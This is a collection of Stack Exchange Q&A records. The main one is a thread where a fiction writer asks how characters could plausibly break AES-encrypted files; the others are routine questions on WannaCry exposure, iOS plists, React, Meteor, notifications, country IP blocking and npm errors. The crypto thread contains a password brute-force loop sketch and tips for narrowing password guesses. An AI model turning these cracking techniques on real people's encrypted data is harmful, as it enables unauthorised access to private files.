(for instance) use it to untraceably steal money from dictators' bank accounts, plant convincing evidence of malfeasance for politicians you don't like, or whatever?\nComment: ... And further to that, you'd need justification for why the NSA, MI5 or whatever agency have not locked you in a small room filled with large men, until you agree not to use what you know, or are unwillingly drafted into whatever agency as a national security asset. All these will either be plot holes if you don't address them, or subplots if you do. (I was tempted to make this an answer, but really it's comments around the question's context, as a reader of books like this, and not actually answering the question.)\nAnswer: Though quantum computers fit the requirements, I'm not sure they are the best option. A general purpose quantum computer capable of attacking modern encryption (RSA, AES) would have serious ramifications on society. It's not only applicable to this one cipher you are breaking.\nDoes it have to be the superior computing resources which gives the good guys the edge? Because I can think of several plausible storylines where the edge comes from a bright idea.\nOption 1: Information about the passphrase.\nIf the good guys learn something about how the passphrase used to derive the encryption key was chosen they could easily reduce the search space time from millennia to months. For example the passwords are always lines from a book where some of the words are replaced with the first letter. Or something else. One way to learn such a pattern is they crack some other password picked by the same person which was encrypted with weaker encryption. 
The hero recognizes the pattern in this other password hypothesizes it may be a common method of selecting passwords and starts a brute force dictionary attack on the reduced space.\nOption 2: General Cryptanalytic improvement.\nOur hero is a master cryptographer. And uses an unknown but plausible cryptanalytic attack on AES to greatly improve speed. This attack could have greatly reduced runtime and it could work on only a fraction of the keys. It could be discovered that a sizeable fraction of keys have some undesired property which makes a superior attack possible (which still requires great computational resources) and they are unsure if the key happens to be such a weak key, they are likely to be able to quantify their success probability in advance.\nOption 3: Identifying a flaw in how the data was encrypted\nWhoever encrypted the data may have messed up. And accidentally left an easier route to attack it. It could be something like applying error correction after compression before encryption (the flaw in GSM). Or something which more directly leads to an attack like keeping a simple hash of the password. The heroes find this flaw and launch a more efficient brute force based on it.\nOption 4: Attack the message not the key\nOut heroes don't try to crack the encryption at all. They utilize knowledge of message and compression system used. and find what possible messages would result in desired size. Though if it's only size it's only viable if we had a small collection of possible messages and the attack will be quick. There are attacks on voice for example where we use size and timing to decipher words and phrases without breaking the encryption.\nComment: Some more possibilities along the lines of option 1: if the files were encrypted by a password that had been frequently typed on some specific keyboard, then if the good guys get the keyboard, they could look at what keys were used more and use that to significantly speed up their attack. Or if the good guys got an audio recording of the password being typed, etc.\nComment: Regarding Option 1, I remember an episode from Elementary about a safe to unlock where the passphrase was just some Pi digits. That was a very unsatisfying episode, given how \"easy\" it is to guess.\nComment: Convoluted way to implement option 1: Say that I have files A and B encrypted with AES-256 and different pwds. I understand that the encryption program will take each pwd, generate a key out of them, and use the key to encrypt\\decrypt. Say A is a lot smaller than B. Will this make it faster to attack A's key? If A's key is found, can A's pwd be reconstructed from its key? (I guess knowing the key and the algorithm restricts the possible pwds from which the key was derived). The good guys could then deduce a pattern from the pwd that they found this way, and try to crack B using this info.\nAnswer: \nParty B will eventually succeed; still, to keep a modicum of suspense up, it must still be possible for them to fail\n\nAn approach that will allow party B to succeed nonetheless\n\nTo me the obvious solution is strategy and HUMINT.\nWith algorithms at the time, say bcrypt and AES-256, plus a high entropy password, party A would spend eternity either attacking the key directly or trying to bruteforce the password. The sun would literally burn out before they succeed. 
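A rough back-of-the-envelope calculation makes the point (a sketch only; the rate of 10^12 keys per second is an arbitrary, generous assumption rather than a real benchmark):\n<code># order-of-magnitude estimate for exhausting an AES-256 keyspace\n# the tested-keys-per-second rate is an illustrative assumption only\nkeyspace = 2 ** 256\nrate = 10 ** 12  # hypothetical keys tested per second\nseconds_per_year = 60 * 60 * 24 * 365\nyears = keyspace \/\/ (rate * seconds_per_year)\nprint(years)  # on the order of 10**57 years; the Sun has roughly 5 * 10**9 left\n<\/code>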
Thus the only option is to discover the correct password, or get very close so they can brute force a similar password derived from what they think it might be.\nAnd thus the best, possibly only option is to use intelligence gathering, psychology, social engineering , etc., trying to figure out what kind of password would have been used by whoever encrypted the files. Maybe they used a similar password on a website that did not use good key derivation (md5), maybe it is something from their past, like a favorite quote. Either way, the frantic search for intelligence gathering, sending people out to research, talk to old friends and colleagues, would probably make for an engaging storyline.\nComment: HUMINT will definitely play a role, though there's something I need to understand anyway. Say I use symmetric encryption, because no file transfer is involved. I know my password by heart and it's stored nowhere else than my head. Do I understand correctly that, each time I want to decrypt my file, the program I'm using will take my password, re-create the symmetric key depending on the algorithm used, and then use the key to decrypt the file?\nComment: @Nicola Generally that is the case, though that can be done in a hardware security module for better security, the password is captured by the HSM, the key is derived, and the ciphertext is converted to plaintext by the HSM. You can also use a password plus a key that is stored on the HSM, so you need that in possession and connected to the computer to decrypt\nAnswer: It's nice to see SciFi authors consulting professionals for technical viability problems. I've got something on my mind for you to consider.\n\nThis is what I need:\nAn algorithm such that, if you encrypt a file with it using a\nhigh-entropy password, is beyond any brute-force attempts using\nknown methods and tech.\n\nThere was a joke a while back in the NIST Post-Quantum Cryptography Standardization project, Daniel J. Berstein proposed pqRSA (which is just RSA with rediculously large public keys) for public-key encryption and digital signature. I think you could say the files are encrypted with <code>3072-bit Elliptic-Curve ElGamal<\/code>\n\nAn approach that will allow party B to succeed nonetheless\n\nQuantum computers of course, but party B must use their special\/innovative\/patented technology to make some kind of huge breakthrough.\nI'd recommend the story progress from party B attempting to <code>entangle 8192 qubits into superposition<\/code>, to them <code>successfully implement extended Euclidean Algorithm (EGCD) over the qubits<\/code>.\nThese are actual current engineering challenges! As of August 2020, we've yet to exceed 100 fully-controlled qubits.\nAnswer: A real-life example:\nWe had a zip file encrypted w\/ the older, rather weak encryption algorithm, used before the introduction of AES-based encryption in the ZIP format.\nThere are brute-force tools to crack ZIP file passwords, there is also a peciliarity of the particular encryption that allows for very quick check for 65535 of every 65536 passwords. Those 1\/65536 of the probable passwords that pass the first test need to decrypt a whole file in order to see if it is the actual password.\nThe ZIP file contained a stray Thumbs.db file.\nThe first person approaching the task removed the Thumbs.db file from the ZIP as no one needed it in the first place (a misguided optimization) and then ran the brute-force tool. 
It ran for a lot of time on a rather powerful machine - and failed.\nThe second person got only the Thumbs.db file as it was a lot smaller than all other files so it could decrypt and decompress faster at each attempt. They removed all other files from the ZIP. They used for the possible password the alphabet native to the author of the ZIP file and only capital letters (deducing the habits of the author from the file names and other available info). They had success in 2-3 days using a lot weaker hardware. The password cracked against the Thumbs.db file happened to work for all other files in the archive.\nTo paraphrase Al Capone: You can get much further with a brute force and an educated guess than with a brute force alone.\nAnswer: I don't really like your setup. Party A has available state-of the-art tech, yet party B wins because they are the good guys while they are both doing basically the same is a bit unrealistic. It could happen that both parties try at random and one is just luckier (and, oh surprise, they are the good guys).\nI would recommend on making party B have an advantage based on having better knowledge on the subject who encrypted it. So for example, party A killed brilliant scientist (let's say Albert) and robbed his plans of a XYZ. Party B (after getting a copy, 4 years later) wants to avoid those falling into the evil hands, and have helping them an old friend of Albert \/ his widow \/ an apprentice... This gives party B an advantage, as they may know some of the passwords Albert used, and thus hypothesize the likely structure of the password they are looking for.\nOr both parties may know that Albert probably used a pet name with some added numbers \/ symbols. While party A bruteforcing is based on lists like Top 1200 Pet Names, Albert friend suddenly remembers (after an evening with his niece) that the first pet of Albert was named after a Pokemon, which then made party B work from a completely different list.\nAnswer: \nThese files were encrypted in 2003. AES is from 2001 if I'm not mistaken, so that's possible, right?\n\nSure. The Rijndael algorithm was first published in 1998, so that's a 5 year gap.\n\nParty B gets the files only later on and manages to crack them in less than two months of continuous trying.\n\nThat's not possible if they are well-encrypted. Either the passwords are weak enough or a different attack is found.\n\nDetails of the tech aren't relevant to the story so I don't need to write about them, but I want to avoid writing things that just don't make sense\n\nSuch as requiring more energy that available in the solar system? We're talking AES-256 here.\n\nMy first guess would be that, advanced as it may be, their tech has limits too and there is such a thing as a password long enough to make their attempts futile.\n\nSounds a bit boring, what about a hardware failure or power outage?\n\nIs it possible to figure out what encryption algorithm was used if all you have is the encrypted files themselves?\n\nDepends on the protocol really, otherwise no, probably not from just the ciphertext. With AES and the file date, just guessing the protocol \/ AES would be good.\nTo make it interesting you could maybe specify an attack where classical analysis is combined with quantum analysis that speeds up the classical analysis more than Grover's law would allow for. 
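For a sense of scale, a plain Grover-style square-root speed-up still leaves about 2^128 AES evaluations, which is exactly why the story would need something better; the snippet below is nothing more than that arithmetic:\n<code>import math\n# Grover only gives a square-root speed-up, so an AES-256 search still costs about 2**128 evaluations\nclassical = 2 ** 256\nquantum = math.isqrt(classical)  # exactly 2**128\nprint(quantum)  # about 3.4 * 10**38, still far beyond any realistic budget\n<\/code>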
AES is not provable secure after all, so better attacks can be found.\nAnswer: Party B could discover that the key was generated from a password and the details of the Key Derivation Function used. Then instead of attacking the encryption key, they can attack the password, which could reduce the number of possibilities to the point where their advanced computers can find the right password in a couple of months.\nAnswer: Depending on what your definition of \"the good guys\" is, you could have a backdoor that has been subtly leaked into the algorithms. The famous DUAL_EC_DRBG would be a case study on this. Of course, since you can use a fictitious algorithm, there's no need for it to be obvious that the particular back door always works. The bad guys could have picked different keys, but thanks to social engineer, there's a really good chance that they picked keys that were publicly recommended, but weak.\nAnother possibility is that the algorithm has a flaw which affects the encryption with some probability. Say, 98% of keys are actually poor keys which permit an attack, while 2% are resilient to it. This sort of thing could easily be overlooked if one is using Big-Oh notation when analyzing the proofs. There are plenty of systems which are NP (vaguely meaning \"brutally hard to solve\"), but only for the worst case. We try our very best to avoid this happening in cryptography, but the whole point of attacks on cryptographic systems is that they do something we didn't think of on the day the algorithm is released.\nWhile this is Crypto, not WorldBuilding or Writing, I'd be remiss to fail to mention Sanderson's First Law of Magic:\n\nSanderson's First Law of Magics: An author's ability to solve conflict with magic is DIRECTLY PROPORTIONAL to how well the reader understands said magic.\n\nHis law of magic applies to technobabble too. You can get away with a lot, cryptographic wise, as long as you follow that law.\nAnd never underestimate the power of rubber hose cryptoanalysis!\nAnswer: Read Neal Stephenson's Cryptonomicon, then read discussion of a significant flaw in the algorithm constructed for the story. Read a bit about the background to analysis of Enigma (Wikipaedia is entirely adequate for this). Then go back to what you're doing :-)\nOne scenario is that the crypto is easy enough to solve by hand, provided that you know its flaw. And discovering its flaw is vastly easier if you have the computing power to wring every bit of statistical information out of the messages.\nAs a specific example, Cryptonomicon alludes to an unbroken Japanese cipher. However the gist of messages encoded in it could be determined, since the protagonist had sufficient (and unprecedented) computing power at his disposal to be able to detect the effects that the messages had (e.g. that the Japanese were suddenly looking for mining engineers).\nAnswer: To me, the idea related to a password and a KDF is the best to fit your scenario here. This would require that Party B, by some means, have learned which KDF was used to generate the key, while Party A did not have this information. Therefore Party A is doing a brute force search on the entire keyspace (which will take an eternity), while Party B is only doing a brute force search on the input passwords to the KDF.\nIf you want to add suspense, maybe Party B doesn't actually know the KDF that was used, but uses some clues about when and where the original encryption occurred to make an educated guess about which KDF was used. 
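The loop Party B would be running is conceptually simple; here is a sketch in which PBKDF2-HMAC-SHA256, the salt, the iteration count, the wordlist file and the <code>try_decrypt<\/code> helper are all placeholders for whatever the real files happen to use:\n<code>import hashlib\n\ndef try_decrypt(key: bytes) -> bool:\n    # hypothetical helper: attempt the decryption and check for a plausible plaintext\n    raise NotImplementedError\n\nsalt = b'placeholder-salt'  # assumption: a salt recovered from the file format\nwith open('candidate_passwords.txt', 'rb') as wordlist:\n    for line in wordlist:\n        password = line.strip()\n        key = hashlib.pbkdf2_hmac('sha256', password, salt, 100000, dklen=32)\n        if try_decrypt(key):\n            print('found:', password)\n            break\n<\/code>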
Then, the suspense comes from the fact that, while brute forcing passwords for the given KDF, there is no guarantee that they picked the right one.\nThis also has a nice narrative element because it shows the good guys thinking of something more clever than the bad guys, and taking a risk on it being true, which after 2 months of uncertainty happens to pay off. During the 4 years preceding, an intelligent Party A may have tried this same strategy as well with all the KDFs it thought could have been used for the files; Party B can use the fact that Party A has not been successful yet, to infer that the KDF is not one of the obvious choices, and thereby narrow down and make some theory of what kind of less common setup could have resulted in such a key.\nAnswer: Another option can be that, these files are encrypted using pairing-based IBE.\nPairing is an elliptic curve operation on 2 ECC points (from the same or different ECC curve) that results in a finite field element.\nIBE is identity-based encryption. The encryption key is the identity\/name of the recipiant, and decryption key is generated from a master private key using a key escrow mechanism.\nParty B can, by their technological supremacy, able to find that the ephemeral variable $k$ is static in all ciphertext (Sony used ECDSA for signing their PS3 console games, and the private key leaked because they failed to sign developer certificates with unpredictable $k$)\nParty B then find out there was an obfuscation applied to the curve parameters used in the pairing operation (I'm making this up, I'm not an expert in pairing-based cryptography, but that seems somewhat plausible to me), but by some chance, they find there was a 3rd curve that can be used to work around the obfuscation.\nFinally party B used some kind of quantum-classical computer combination, enumerated the 3rd curve, and managed to recover the master key, thus find out all of the escrowed decryption key.\nAnswer: You are asking for: \"An approach that will allow party B to succeed nonetheless.\"\nIt's probably not a good idea to present in technical terms the benefits of one algorithm over another as they exist in 2020. You said you're writing a story. You probably want it to make sense to a wide audience, but not look stupid like the password-cracking session in Clear and Present Danger (1994).\n\nParty A attacks the blind entropy of the password, and fails after expending huge amounts of computing resources (e.g. AWS EC2, perhaps using a stolen credit card).\nParty B attacks the human aspects of the password, and succeeds while expending far less computing resources (e.g. a monster gaming rig they build themselves).\n\nA strong password still needs to be memorable and convenient to type. A strong password is often required to have an upper case letter, a number, and a symbol. From past password cracking competitions I have studied, a sizable fraction of those passwords fit the pattern of starting with a capital letter, followed by all lower case letters, followed by a number, and ending with a symbol. In your story, party B designs its brute-force password cracker to only use that pattern, reducing the combinations of tries needed by a factor of several powers of ten.\nAnswer: To be honest, there doesn't have to be anything clever here. Simply trying brute force - i.e. 
try all combinations, on a good cipher will work for the narrative - that's because while it is true that you can't guarantee decryption before trying all keys, it is also true that Party B might win on the first try, or at least an 'early' one. So B starts later, but has better tech so is catching up, but can't guarantee a win until it comes (suspense as requested). The only issue with a good cipher is whether either of them would bother wasting their time - because it is unlikely either would succeed. But they could - and this is fiction.\n","meta":{"source":"crypto.stackexchange","title":"Cryptography elements needed for a story","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it safe to install MS17-010 unpatched OS as guest on patched host?\n\nQuestion: For example, these are unpatched old OS.\n\nWindows 98\nWindows 98 SE\nWindows ME\nWindows NT 4.0\nWindows 2000\n\nGiven that SMBv1 is not disabled on host but already patched.\nIs the unpatched guest OS itself still vulnerable on already patched host?\n\nWannaCry Ransomware: Patch released for Microsoft Windows XP, Server 2003 and 8\nhttps:\/\/soggi.org\/news\/WannaCry-Ransomware-Patch-for-Microsoft-Windows-XP-Server-2003-8.htm\nAnswer: If the guest is unpatched and has the vulnerability present then yes it is vulnerable. If the guest has any of its interfaces NAT'ed or Bridged to an unprotected network then the guest is exploitable via WannaCrypt.\n","meta":{"source":"security.stackexchange","title":"Is it safe to install MS17-010 unpatched OS as guest on patched host?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Problems to build info.plist property (React-native IOS)\n\nQuestion: I'm trying to run yarn ios to build my app.\nBut I have an exception:\n<code>ProcessInfoPlistFile \/Users\/flavio.luiz\/Library\/Developer\/Xcode\/DerivedData\/growerdiariesapp-fsidgwpdrbcpxubccmkpffoykvsz\/Build\/Products\/Debug-iphonesimulator\/growerdiariesapp.app\/Info.plist \/Users\/flavio.luiz\/Documents\/learning\/grower-diaries-app\/growerdiariesapp\/ios\/growerdiariesapp\/Info.plist (in target 'growerdiariesapp' from project 'growerdiariesapp')\n cd \/Users\/flavio.luiz\/Documents\/learning\/grower-diaries-app\/growerdiariesapp\/ios\n builtin-infoPlistUtility \/Users\/flavio.luiz\/Documents\/learning\/grower-diaries-app\/growerdiariesapp\/ios\/growerdiariesapp\/Info.plist -producttype com.apple.product-type.application -genpkginfo \/Users\/flavio.luiz\/Library\/Developer\/Xcode\/DerivedData\/growerdiariesapp-fsidgwpdrbcpxubccmkpffoykvsz\/Build\/Products\/Debug-iphonesimulator\/growerdiariesapp.app\/PkgInfo -expandbuildsettings -format binary -platform iphonesimulator -additionalcontentfile \/Users\/flavio.luiz\/Library\/Developer\/Xcode\/DerivedData\/growerdiariesapp-fsidgwpdrbcpxubccmkpffoykvsz\/Build\/Intermediates.noindex\/growerdiariesapp.build\/Debug-iphonesimulator\/growerdiariesapp.build\/LaunchScreen-SBPartialInfo.plist -additionalcontentfile \/Users\/flavio.luiz\/Library\/Developer\/Xcode\/DerivedData\/growerdiariesapp-fsidgwpdrbcpxubccmkpffoykvsz\/Build\/Intermediates.noindex\/growerdiariesapp.build\/Debug-iphonesimulator\/growerdiariesapp.build\/assetcatalog_generated_info.plist -o \/Users\/flavio.luiz\/Library\/Developer\/Xcode\/DerivedData\/growerdiariesapp-fsidgwpdrbcpxubccmkpffoykvsz\/Build\/Products\/Debug-iphonesimulator\/growerdiariesapp.app\/Info.plist\nerror: unable to read property list from file: 
\/Users\/flavio.luiz\/Documents\/learning\/grower-diaries-app\/growerdiariesapp\/ios\/growerdiariesapp\/Info.plist: The operation couldn't be completed. (XCBUtil.PropertyListConversionError error 1.) (in target 'growerdiariesapp' from project 'growerdiariesapp')\n<\/code>\ni think that could be a problem with the properties of the info list. I recently changed the file to remove react-native-vector-icons:\n<code><?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-\/\/Apple\/\/DTD PLIST 1.0\/\/EN\" \"http:\/\/www.apple.com\/DTDs\/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>CFBundleDevelopmentRegion<\/key>\n <string>en<\/string>\n <key>CFBundleDisplayName<\/key>\n <string>grower diaries<\/string>\n <key>CFBundleExecutable<\/key>\n <string>$(EXECUTABLE_NAME)<\/string>\n <key>CFBundleIdentifier<\/key>\n <string>$(PRODUCT_BUNDLE_IDENTIFIER)<\/string>\n <key>CFBundleInfoDictionaryVersion<\/key>\n <string>6.0<\/string>\n <key>CFBundleName<\/key>\n <string>$(PRODUCT_NAME)<\/string>\n <key>CFBundlePackageType<\/key>\n <string>APPL<\/string>\n <key>CFBundleShortVersionString<\/key>\n <string>1.0<\/string>\n <key>CFBundleSignature<\/key>\n <string>????<\/string>\n <key>CFBundleVersion<\/key>\n <string>1<\/string>\n <key>LSRequiresIPhoneOS<\/key>\n <true\/>\n <key>NSAppTransportSecurity<\/key>\n <dict>\n <key>NSExceptionDomains<\/key>\n <dict>\n <key>localhost<\/key>\n <dict>\n <key>NSExceptionAllowsInsecureHTTPLoads<\/key>\n <true\/>\n <\/dict>\n <\/dict>\n <\/dict>\n <key>NSLocationWhenInUseUsageDescription<\/key>\n <string\/>\n <key>UILaunchStoryboardName<\/key>\n <string>LaunchScreen<\/string>\n <key>UIRequiredDeviceCapabilities<\/key>\n <array>\n <string>armv7<\/string>\n <\/array>\n <key>UISupportedInterfaceOrientations<\/key>\n <array>\n <string>UIInterfaceOrientationPortrait<\/string>\n <string>UIInterfaceOrientationLandscapeLeft<\/string>\n <string>UIInterfaceOrientationLandscapeRight<\/string>\n <\/array>\n <key>UIViewControllerBasedStatusBarAppearance<\/key>\n <false\/>\n <key>UIAppFonts<\/key>\n<\/dict>\n<\/plist>\n<\/code>\nI just tried <code>plutil info.plist<\/code> and that is the answer:\n<code>info.plist: Value missing for key inside <dict> at line 55\n<\/code>\nDoes anybody know how to solve this problem?\nComment: Which line is line 55? Where does it point to?\nAnswer: I got it.\nI just remove UIAppFonts key from Info.plist and it worked. Key are declared but has no value reference.\n","meta":{"source":"stackoverflow","title":"Problems to build info.plist property (React-native IOS)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using react-native components for react web\n\nQuestion: How can we use share components between react-native and react web projects. I have read react native can be derived from react. How is it possible to use same js code between two projects (fully or partially) ?\nAnswer: Take a look at the <code>react-native-web<\/code> library. It's pretty good:\nhttps:\/\/github.com\/necolas\/react-native-web\nAs long as you only use react native components, e.g. <code>View<\/code> instead of <code>div<\/code>, and <code>Text<\/code> instead of <code>p<\/code> etc, you'll be able to share view components between your app and website. 
Then you can pass down all the data from API calls etc as props from within the individual mobile app\/website code.\nIn my projects I have a <code>common<\/code> folder that contains all these shared view components, and only put the platform specific code inside <code>mobile<\/code> or <code>web-app<\/code>. It works pretty well that way.\n","meta":{"source":"stackoverflow","title":"Using react-native components for react web","dup_signals":{}},"subset":"stackexchange"} +{"text":"Meteor: subscribe to external datasource\n\nQuestion: In Meteor I want to subscribe to events outside meteor and insert any updates in a collection, i.e.\n<code>external_subscriber.subscribe(\"some data\");\n\nexternal_subscriber.on('message', function(data) {\n meteor_collection.insert({newdata:data.toString()});\n}));\n<\/code>\nMeteor tells me to run this in a fibre. Normally I would use async and futures, but this is not an async call. How to subscribe to external data and insert results in collections?\nAnswer: Enclose call to meteor collection into new fiber as shown as follows- \n<code>external_subscriber.on('message', function(data) {\n new Fiber(()->\n meteor_collection.insert({newdata:data.toString()});\n ).run()\n}));\n<\/code>\nThis should work\n","meta":{"source":"stackoverflow","title":"Meteor: subscribe to external datasource","dup_signals":{}},"subset":"stackexchange"} +{"text":"Vibrate notification only on wearable device\n\nQuestion: Is it possible to do a vibrate notification on a wearable device but without set any sound or vibration on the phone? I want to allow to vibrate the watch but not the phone. There is a settings in the android wear app but it's a general settings and not app specific.\nAnswer: Yes, you just create notification on the Wear device itself (use Message API to trigger it), and it will be shown only on the smartwatch, so if you set vibrations for it - only smartwatch will vibrate.\nComment: I agree with you but I found a very simple solution.\nAnswer: There is not similar feature in Android. Developer reference doesn't provide any information about function you described. 
I think, you should suggest user to decide about vibrations and notifications.\nAnswer: I simply used a silent.mp3 file and I set it as notification sound :)\nAnswer: \nyou must set permision in Androidmanifest.xml\nuses-permission android:name=\"android.permission.VIBRATE\" \nAdd Code (I have a button when you click on phone, A notification and vibrate will active on watch) \n<code> Button wearButton = (Button)findViewById(R.id.wearButton);\n wearButton.setOnClickListener(new View.OnClickListener() {\n @Override\n public void onClick(View v) {\n\n int notificationId = 001;\n Bitmap bitmap = BitmapFactory.decodeResource(getResources(), R.drawable.ic_background);\n NotificationCompat.BigPictureStyle style = new NotificationCompat.BigPictureStyle();\n style.bigPicture(bitmap);\n\n \/\/big image\n NotificationCompat.Builder notificationBuilder =\n new NotificationCompat.Builder(MainActivity.this)\n\n .setSmallIcon(R.drawable.baby)\n .setContentTitle(\"Title\")\n .setContentText(\"Android Wear Notification\");\n notificationBuilder.setStyle(style);\n\n \/\/Vibration\n notificationBuilder.setVibrate(new long[]{1000, 1000, 1000, 1000, 1000, 1000, 1000});\n\n \/\/Ton\n \/\/ notificationBuilder.setSound(R.);\n\n NotificationManagerCompat notificationManager =\n NotificationManagerCompat.from(MainActivity.this);\n notificationManager.notify(notificationId, notificationBuilder.build());\n }\n});\n<\/code>\n\nI have a complete project if you wan you can download \nhttps:\/\/app.box.com\/s\/veb68n0uzxcmotyo0rmfrxgyoig032lc\n","meta":{"source":"stackoverflow","title":"Vibrate notification only on wearable device","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to update data in mysql when user share post on facebook using Facebook SDK for JavaScript\n\nQuestion: I want to update my database when user share post on fb. I am using Facebook SDK for JAVASCRIPT.\nMy Code Is:-\n<code> <script>\n document.getElementById('shareBtn').onclick = function() {\n FB.ui({\n method: 'share',\n display: 'popup',\n href: 'url goes here',\n }, function(response){\n if (response && response.post_id) {\n \/\/ajax code goes here for database update\n } else {\n alert('oops post was not published');\n }\n });\n }\n <\/script>\n<\/code>\nButton Code-\n<code> <div class=\"fb-share-button\" \n data-href=\"url goes here\" \n data-layout=\"button\" data-size=\"large\">\n <\/div>\n<\/code>\nI am able to share the post but how to update the mysql data when user successfully sharesthe post \nComment: see my answer. what is the use case for this btw? why do you want to update the database if the user shared something?\nComment: That is not even allowed ... you can not reward the user for sharing in any way. You should go read [Platform Policy](https:\/\/developers.facebook.com\/policy) before you proceed.\nComment: @luschn actually i am working on a project which rewards the user when the user successfully share the posts\nAnswer: You will only know if the user shared something if you authorize the user with the <code>publish_actions<\/code> permission. 
That permission needs to get reviewed by Facebook, and Facebook will not approve it just for this, i\u00b4m afraid.\nIn other words: It is not possible.\n","meta":{"source":"stackoverflow","title":"how to update data in mysql when user share post on facebook using Facebook SDK for JavaScript","dup_signals":{}},"subset":"stackexchange"} +{"text":"Trying to insert line break into HTML with vanilla JS\n\nQuestion: I've been coding with JavaScript for a while now and I just started using the features for adding HTML elements through JavaScript and I have a button that adds two input fields each time it's pressed. The first time the user presses the button I want the element pushed down 250px from the top, and each time have about 20px spacing, but instead of that, well you'll see when you run the code. This question not the same as append many elements because its not my real issue, my real issue is trying to get each pair of input values separated by 20px from the other one each time the button is pressed.\n\n<code>let addN = document.getElementById(\"adda\");\nlet margin = 250;\n\naddN.addEventListener(\"click\", () => {\n let newCoordsX = document.createElement('input');\n let newCoordsY = document.createElement('input');\n newCoordsX.placeholder = \"X value\";\n newCoordsY.placeholder = \"Y value\";\n newCoordsX.style.marginTop = margin + \"px\";\n document.body.appendChild(newCoordsX);\n document.body.appendChild(newCoordsY);\n});<\/code>\n<code>#adda {\n position:absolute;\n top:140px;\n \/*left:-1300px;*\/\n left: 0px;\n width:180px;\n height:40px;\n padding:5px;\n background-color:rgb(171, 202, 252);\n border-radius:15px;\n}\n\n#add {\n position:absolute;\n color:white;\n font-weight:bold;\n font-size:21px;\n left:14px;\n top:10px;\n}\n\n#adda:hover{\n cursor:pointer;\n background-color:rgb(191, 215, 252);\n}<\/code>\n<code><div id=\"adda\">\n <div id=\"add\">Add another node<\/div>\n<\/div><\/code>\nComment: @Mukyuu that's just a side problem my real problem is getting the two inputs to have a line break between them each time\nComment: did you tried `margin-left:20px;` for space\nAnswer: You can change the <code>display<\/code> of inputs to <code>block<\/code>\n\n<code>let addN = document.getElementById(\"adda\");\nlet margin = 250;\n\naddN.addEventListener(\"click\", () => {\n let newCoordsX = document.createElement('input');\n let newCoordsY = document.createElement('input');\n newCoordsX.placeholder = \"X value\";\n newCoordsY.placeholder = \"Y value\";\n newCoordsX.style.marginTop = margin + \"px\";\n newCoordsX.style.display = \"block\"\n newCoordsY.style.display = \"block\"\n document.body.appendChild(newCoordsX);\n document.body.appendChild(newCoordsY);\n \n});<\/code>\n<code>#adda {\n position:absolute;\n top:140px;\n \/*left:-1300px;*\/\n left: 0px;\n width:180px;\n height:40px;\n padding:5px;\n background-color:rgb(171, 202, 252);\n border-radius:15px;\n}\n\n#add {\n position:absolute;\n color:white;\n font-weight:bold;\n font-size:21px;\n left:14px;\n top:10px;\n}\n\n#adda:hover{\n cursor:pointer;\n background-color:rgb(191, 215, 252);\n}<\/code>\n<code><div id=\"adda\">\n <div id=\"add\">Add another node<\/div>\n<\/div><\/code>\n","meta":{"source":"stackoverflow","title":"Trying to insert line break into HTML with vanilla JS","dup_signals":{}},"subset":"stackexchange"} +{"text":"Country Blocking\n\nQuestion: I use a Meraki firewall and want to block outside attack attempts. Is there a list of countries that are known to be malicious? 
I want to load them into the system and GEO block them. I know that some legitimate sites have hosting in another country. Can this pose an issue? Any suggestions would be highly appreciated. I want to ensure we have a secure outside perimeter. \nComment: So, does this answer your question: https:\/\/security.stackexchange.com\/questions\/72230\/is-blocking-a-countrys-access-to-a-website-a-good-measure-to-avoid-hackers-from\nComment: https:\/\/blogs.akamai.com\/sitr\/2018\/07\/geographic-normalization-of-web-attack-data.html I found this to be a fun look at some of the data out there.\nComment: Thanks for sharing :) that was informational. I am looking for something like a list of regions or IP's I can plug into the ruling.\nComment: The lists of historically cyber aggressive nations are very, very easy to look up. I'm curious about your approach, though. Why blacklist certain countries? Are you expecting random outside connections to be made through your router? Are you wanting to block outgoing connections?\nComment: Like I know China and Russia is an obvious one.. I see no reason why my users data should be beaconing to those countries or weird foreign IP's in general since we only operate within the US. I want to block foreign IP's from performing nmap scans etc..\nComment: So ... it's a corporate router and you want to block both incoming and outgoing connections to these countries? If so, those are important details. And I believe we have a duplicate already asked.\nComment: Yes, this is on a corporate network.\nComment: That shed some light.. This is something I have to further think about and decide. But the obvious country I should block is China, Russia, etc.\nAnswer: Filtering entire countries' IP ranges will significantly cut down on the amount of malicious traffic coming from actors in those countries, but it will almost 100% ENTIRELY block legitimate users from those countries.\nAlso, while this is a decent approach to cope with automated scans, it does nothing against a human attacker, who will simply VPN their traffic.\nIP blocking is best used for time-sensitive operations, like defending against a sudden spike of malicious traffic out of an IP range. Since it can be easily overcome, it's not an actual 'defense'; it's just a roadblock meant to momentarily impede, deter, or annoy.\n","meta":{"source":"security.stackexchange","title":"Country Blocking","dup_signals":{}},"subset":"stackexchange"} +{"text":"Resolve peer dependency of aliased package breaks npm install\n\nQuestion: I'm trying to test my npm package against different versions of React. 
So I set up aliases for older version in <code>package.json<\/code>:\n<code>{\n \"name\": \"gatsby-plugin-i18n-l10n\",\n [..]\n \"peerDependencies\": {\n \"gatsby\": \"^4.x\",\n \"gatsby-source-filesystem\": \"^4.x\",\n \"react-helmet\": \"^6.1.x\",\n \"react-intl\": \"^5.20.x\"\n },\n \"peerDependenciesMeta\": {\n \"gatsby-source-filesystem\": {\n \"optional\": true\n }\n },\n \"devDependencies\": {\n [..]\n \"react\": \"18.0.0\",\n \"react-17\": \"npm:firstname.lastname@example.com\",\n \"react-dom\": \"18.0.0\",\n \"react-dom-17\": \"npm:email@example.com\",\n [..]\n \"react-test-renderer\": \"18.0.0\",\n \"react-test-renderer-17\": \"npm:firstname.lastname@example.com\",\n [..]\n },\n \"dependencies\": {\n \"limax\": \"^3.0.0\",\n \"path-browserify\": \"^1.0.1\"\n }\n}\n<\/code>\nWhile researching this I've found another question which is similar NPM: Link peer dependency to package alias, which works, but <code>npm install<\/code> still throws the following error:\n<code>npm ERR! ERESOLVE unable to resolve dependency tree\nnpm ERR! \nnpm ERR! While resolving: firstname.lastname@example.com\nnpm ERR! Found: email@example.com\nnpm ERR! node_modules\/react\nnpm ERR! dev react@\"18.0.0\" from the root project\nnpm ERR! \nnpm ERR! Could not resolve dependency:\nnpm ERR! peer react@\"17.0.2\" from email@example.com\nnpm ERR! 